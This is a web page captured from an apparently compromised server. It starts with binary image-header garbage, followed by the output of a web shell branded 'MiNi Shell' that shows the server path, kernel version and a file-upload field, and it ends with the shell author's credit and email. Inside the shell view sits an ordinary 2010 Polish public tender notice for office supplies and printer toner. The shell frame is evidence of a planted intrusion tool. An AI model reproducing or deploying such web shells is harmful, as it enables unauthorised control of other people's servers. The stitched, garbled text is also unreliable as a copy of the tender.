JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100216/31755-N-2010.html

<p class="kh_header"><b>Nowy Sącz: PCFE 3421/9/10 Zamówienie na dostawę materiałów biurowych i tonerów</b><br>
<b>Numer ogłoszenia: 31755 - 2010; data zamieszczenia: 16.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Funduszy Europejskich , ul. Nawojowska 118, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 41 41 804, faks 18 41 41 700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcfe.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PCFE 3421/9/10 Zamówienie na dostawę materiałów biurowych i tonerów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów biurowych i tonerów:
L.p	Przedmiot zamówienia 	Jednostka  miary	Ilość 
1	Klej biurowy w sztyfcie 35 g.	szt.	15
2	Korektor w płynie z pędzelkiem klasy STANGER 20ml.	szt.	36
3	Karteczki samoprzylepne 51x76 pakowane w torebki foliowe z paskiem ułatwiającym natychmiastowe otwarcie, substancja klejąca usuwana za pomocą wody.	szt.	30
4	Notes samoprzylepny (memo) 75x75mm, karteczki samoprzylepne w pastelowych kolorach.	szt.	20
5	Spinacze okrągłe R 28 mm 100 szt. w opakowaniu.	op./100	50 op.
6	Spinacze okrągłe R 50 mm 100 szt. w opakowaniu.	op./100	30 op.
7	Taśma klejąca biurowa 18 mm x 30 m, wykonana z polipropylenu, pokryta klejem akrylowym.	op./8 szt.	2 op.
8	Tusz do stempli zwykłych i polimerowych bezolejowy klasy Norris czerwony 30ml.	szt.	2
9	Koperta C4 HK biała.	op./250	2 op.
10	Koperta C6 SK biała.	op./1000	1 op.
11	Gumka do mazania. 	szt.	15
12	Linijka przezroczysta, plastikowa, dł. 30 cm.	szt.	5
13	Linijka przezroczysta, plastikowa, dł. 50 cm.	szt.	3
14	Nożyczki biurowe  21 cm, z satynowym ostrzem ze stali nierdzewnej; ergonomicznie wyprofilowana rękojeść z niełamliwego plastiku.	szt.	30
15	Temperówka metalowa wykonana ze specjalnego stopu magnezu, stalowe ostrze mocowane wkrętem. Rowkowane wgłębienia w korpusie ułatwiające trzymanie.	szt.	8
16	Zszywacz wykonany z tworzywa sztucznego, części mechaniczne z metalu. Zszywa 25 kartek zszywkami 24/6, głębokość wsuwania kartek: 55 mm, kolor: czarny.	szt.	26
17	Zszywacz długoramienny. Listwa ogranicznika regulowana do formatów od A6 do A2, US-Norm oraz folio, skala calowa i milimetrowa, pojemność magazynka 150 zszywek 24/6, 24/8 lub 210 zszywek 26/6, 26/8, zszywa plik kartek 80 g/m2 do grubości 4 mm, głębokość wsuwania kartek do 300mm.	szt.	1
18	Dziurkacz z antypoślizgową, plastikową nakładką, przeźroczysty pojemnik na odpadki (nie spada podczas opróżniania), dziurkuje do 16 kartek, średnica dziurek 5,5 mm- odległość miedzy dziurkami 80 mm- z ogranicznikiem formatu (A4, A5, A6, Folio, Us Quart, 8x8x8).	szt.	29
19	Cienkopis czarny grubość linii 0,4 mm; bezwonny, odporny na działanie światła; tusz na bazie wody.	szt.	30
20	Cienkopis niebieski grubość linii 0,4 mm; bezwonny, odporny na działanie światła; tusz na bazie wody.	szt.	30
21	Marker permanentny atramentowy na bazie alkoholu, szybkoschnący, podwójny system szczelności skuwki z końcówką okrągłą grubość linii pisania 1,5 mm, czerwony.	szt.	20
22	Marker permanentny atramentowy na bazie alkoholu, szybkoschnący, podwójny system szczelności skuwki z końcówką okrągłą grubość linii pisania 1,5 mm, niebieski.	szt.	20
23	Marker permanentny atramentowy na bazie alkoholu, szybkoschnący, podwójny system szczelności skuwki z końcówką okrągłą grubość linii pisania 1-3mm, czarny.	szt.	20
24	Ołówek drewniany z gumką.	szt.	1220
25	Zakreślacz fluorescencyjny żółty.	szt.	20
26	Zakreślacz fluorescencyjny różowy.	szt.	20
27	Zakreślacz fluorescencyjny zielony.	szt.	20
28	Długopis żelowy klasy PILOT G1 niebieski.	szt.	250
29	Długopis żelowy klasy PILOT G1 czarny.	szt.	50
30	Długopis niebieski, automatyczny z gumowanym korpusem, grubość końcówki 1.0mm, długość linii pisania - 2100m.	szt.	450
31	Koszulki U na dokumenty A4, wykonane z folii o standardowej grubości 55mic, krystalicznie przezroczyste.	op./100	40 op.
32	Pudełko archiwizacyjne 80 mm do przechowywania dokumentów o formacie A4 wypiętych z segregatora, miejsca do opisu zawartości na grzbietach i bocznej ściance, otwór na palec ułatwiający wkładanie i wyjmowanie pudełka z półki, grzbiet 80 mm, mieści 800 kartek.	szt.	30
33	Skoroszyt zawieszkowy z białego kartonu o gramaturze 275 g., pełny, Format A4.	op./50	1 op.
34	Skoroszyt A4 plastikowy miękki zawieszkowy. Przednia okładka przezroczysta, tylna kolorowa - wykonany z miękkiego PCV- wyposażony w papierowy, wysuwany pasek do opisu.	op./50	31 op.
35	Teczka kartonowa wiązana, do przenoszenia i przechowywania dokumentów, trzy skrzydła wewnętrzne, kolor: biały, format A4.	op./50	7 op.
36	Teczka kartonowa z gumką, do przenoszenia i przechowywania dokumentów, trzy skrzydła wewnętrzne, kolor: biały, format A4.	op./50	1 op.
37	Zszywki 24/6 klasy STAPLES.	op./1000	30 op.
38	Rozszywasz.	szt.	5
39	Kostka biurowa klejona biała 85x85 w stabilnym pojemniku wykonanym z przezroczystego tworzywa.	szt.	5
40	Zakładki indeksujące papierowe 20x38 mm 4 kolory.	szt.	15
41	Zakładki papierowe indeksujące, w opakowaniu 4 bloczki w różnych neonowych kolorach, wymiary 20x40.	op./4 szt.	20 op.
42	Przybornik na biurko. Wykonany metodą wtryskową z krystalicznie przezroczystego akrylu; praktycznie rozmieszczone przegrody umożliwiają uporządkowane przechowywanie wszelkich niezbędnych na biurku drobiazgów typu spinacze, gumki, długopisy, pisaki, kartki na notatki, odrywacz do taśmy.	szt.	10
43	Segregator A4 50mm mech niebieski.	szt.	30
44	Segregator A4 75mm mech niebieski.	szt.	30
45	Segregator A4 marmurkowy, z mechanizmem, szer. grzbietu 70mm.	szt.	180
46	Pinezki.	op./100	5 op.
47	Pinezki Beczułka.	op./100	3 op.
48	Grafity 0,5 HB (rysiki do ołówków).	op./12	15
49	Notes w etui, z kalkulatorem i paskiem na długopis(+długopis), wielkość 14x9,5x2cm. 	szt.	120
50	Teczka A4 z gumką (gumki narożne) - wykonana z tektury o zwiększonej gramaturze i sztywności (450g)- jednostronnie barwiona, powlekana folią polipropylenową, kolor niebieski.	szt.	120
51	Teczka z gumką wzdłuż, gładka, kolor czarny, kartonowa, format A4.	szt.	80
52	Blok biurowy A4 w kratkę, 100 kartek. 
szt.	80
53	Papier do drukarek laserowych i atramentowych, Gramatura - 80 +/- 4 g/m2 (ISO 536), Format A4, Kolor niebieski jasny IQ-28.	ryza/500	2 ryzy
54	Papier do drukarek laserowych i atramentowych, Gramatura - 80 +/- 4 g/m2 (ISO 536), Format A4, Kolor kremowy jasny IQ-28.	ryza/500	2 ryzy
55	Papier format A4 gramatura 80g/m2, wilgotność 3,8-5,0 %, grubość 108 um, białość 161 CIE, nieprzezroczystość większa lub równa 91 %, zaklejenie mniejsze lub równe 30 g/m2, przepuszczalność powietrza mniejsza lub równa 1.250 cm3/min, gładkość 180?50cm3/min.	ryza/500	475 ryz
56	Tusz do urządzenia HP Officejet Pro 8500 Wireless All-in-One Printer - A909g Black.	szt.	4
57	Tusz do urządzenia HP Officejet Pro 8500 Wireless All-in-One Printer - A909g Cyan.	szt.	4
58	Tusz do urządzenia HP Officejet Pro 8500 Wireless All-in-One Printer - A909g Magenta.	szt.	4
59	Tusz do urządzenia HP Officejet Pro 8500 Wireless All-in-One Printer - A909g Yellow.	szt.	4
60	Toner do drukarki OKI B 410D.	szt.	1
61	Toner do drukarki Lexmark E360.	szt.	1
62	Toner do drukarki OKI B 4545 MFP.	szt.	4
63	Toner do drukarki Lexmark E260 dn.	szt.	30
64	Toner do urządzenia wielofunkcyjnego Lexmark X364 dn.	szt.	13
65	Toner do drukarki Samsung ML 1640.	szt.	1
66	Toner do drukarki Samsung ML 2571.	szt.	2
67	Toner do drukarki Kyocera KM 1620.	szt.	1
68	Zestaw tonerów do drukarki HP color laser Jet 1600 (black, cyan, magenta, yellow).	szt.	1
69	Toner do kserokopiarki Panasonic WORKIO DP-1520.	szt.	2
70	Toner do drukarki BROTHER DCP 8060.	szt.	1
71	Toner do kserokopiarki Kyocera Mita 1560.	szt.	1
72	Toner do drukarki HP 1020 Laser Jet.	szt.	2
73	Toner do drukarki HP P1005.	szt.	1
74	Toner do kserokopiarki SHARP AR-5316.	szt.	1
75	Toner do drukarki HP Laser Jet 1000.	szt.	1
76	Toner do kserokopiarki Panasonic WORKIO DP-8016.	szt.	3
77	Toner do drukarki Lexmark E120IC - L120 16 SET.	szt.	1
78	Toner do drukarki Samsung IC - SML 2010N.	szt.	1
79	Zestaw tuszy do drukarki HP 9800 (black, cyan, magenta, yellow).	szt.	1

Zamawiający wymaga aby:
- dostarczone materiały eksploatacyjne do drukarek laserowych były fabrycznie nowe bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, nierefabrykowane,       
- wszystkie elementy wchodzące w skład materiałów eksploatacyjnych do drukarek (np. kaseta, bęben światłoczuły, listwa podająca, listwa zbierająca, listwa czyszcząca, wałek grzewczy, wałek dociskowy, głowica drukująca, toner, atrament, tusz) muszą być fabrycznie nowe, nieregenerowane, nierefabrykowane, niewchodzące wcześniej (pierwotnie) w całości ani w części, w skład innych materiałów (nieużywane).
- dostarczone materiały eksploatacyjne do drukarek laserowych muszą być materiałami odpowiadającymi parametrom techniczno-eksploatacyjnym wskazanych urządzeń zgodnie  z wymogami producenta tych urządzeń. 
- dostarczane materiały eksploatacyjne muszą posiadać gwarancję producenta.
- w przypadku dostarczenia zamienników materiałów oryginalnych, Wykonawca zobowiązany jest objąć gwarancją urządzenie, w którym zostanie użyty toner na okres przebiegu tonera w tym urządzeniu.
- dostarczane materiały muszą spełniać wymogi jakościowe nie gorsze niż materiały oryginalne producenta urządzenia.
- dostarczone przez Wykonawcę materiały eksploatacyjne muszą posiadać znak firmowy producenta, etykiety zawierające numer katalogowy i termin jego ważności.
- za produkt fabrycznie nowy (nowo wytworzony w całości) i nieregenerowany nie uznaje się wyrobu eksploatowanego wcześniej czy uzupełnionego lub wyrobu wykonanego z zastosowaniem używanych elementów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7, 24.91.00.00-6, 22.80.00.00-8, 30.19.72.20-4, 44.42.42.00-0, 30.19.92.30-1, 39.29.25.00-0, 39.24.12.00-5, 30.19.00.00-7, 30.19.73.20-5, 30.19.73.30-8, 22.99.30.00-7, 22.99.00.00-6, 30.19.76.42-8, 30.23.74.30-2, 30.19.21.25-3, 30.19.21.30-1, 30.19.21.21-5, 30.19.95.00-5, 22.85.10.00-0, 30.19.71.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nowym Sączu, ul. Jagiellońska 33, 33-300 Nowy Sącz, Wydział Administracyjny, Stanowisko ds. Zamówień Publicznych, pok. 320.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 13:00, miejsce: Starostwo Powiatowe w Nowym Sączu, ul. Jagiellońska 33, 33-300 Nowy Sącz, Kancelaria Administracyjna, pok. 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest dofinansowane z Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - realizacja projektów: Aktywna Edukacja, Możemy Więcej  oraz Generacja 45+..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com